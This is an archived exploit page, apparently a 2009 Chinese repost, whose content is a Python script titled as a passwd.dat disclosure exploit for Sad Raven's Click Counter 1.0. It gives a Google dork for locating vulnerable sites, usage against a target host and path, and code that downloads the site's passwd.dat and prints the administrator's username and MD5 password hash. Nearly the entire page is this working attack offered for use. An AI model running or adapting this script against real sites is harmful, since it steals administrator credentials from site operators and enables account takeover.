Sad Raven's Click Counter 1.0 passwd.dat Disclosure Exploit
|
来源:Pouya.s3rver@Gmail.com 作者:Pouya_Server 发布时间:2009-01-22
|
|
#!/usr/bin/python #Portal Name: Sad Raven's Click Counter #version : 1.0 #'Google Dork : Sad Raven's Click Counter v1.0 #Exploit Coded by: Pouya_Server #Exploit Discovered by: Pouya_Server #Contact Me : Pouya.s3rver@Gmail.com import urllib import sys import parser serv="http://" i=0 for arg in sys.argv: i=i+1 if i!=3: print """\n\n \tSad Raven's Click Counter v1.0 (passwd.dat) \tUsage:exploit.py [targetsite] [path] \tExample:exploit.py www.target.com /Path/ \tResult=$Password['Admin']="c71032e32b9ce349f99f655e68d7324g" \t $Password['Admin Username']="Admin Password [MD5]" \n\n""" else: adres=sys.argv[1] path=sys.argv[2] str1=adres.join([serv,path]) str2=str1.join(['','/passwd.dat']) print "\n[~]Connecting..." url=urllib.urlopen(str2).read(); print "\n[+]Connected!" test=url.find(path); t=0; print "\n\t\t\t-=[Admin Username and Password]=-" while(url[test+1]!=1): # Pouya print url[test], if(url[test]=='\n'): t=t+1; if(t==2): break; test=test+1; print "\n\n\t\t\t[ coded by Pouya_Server ]"
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|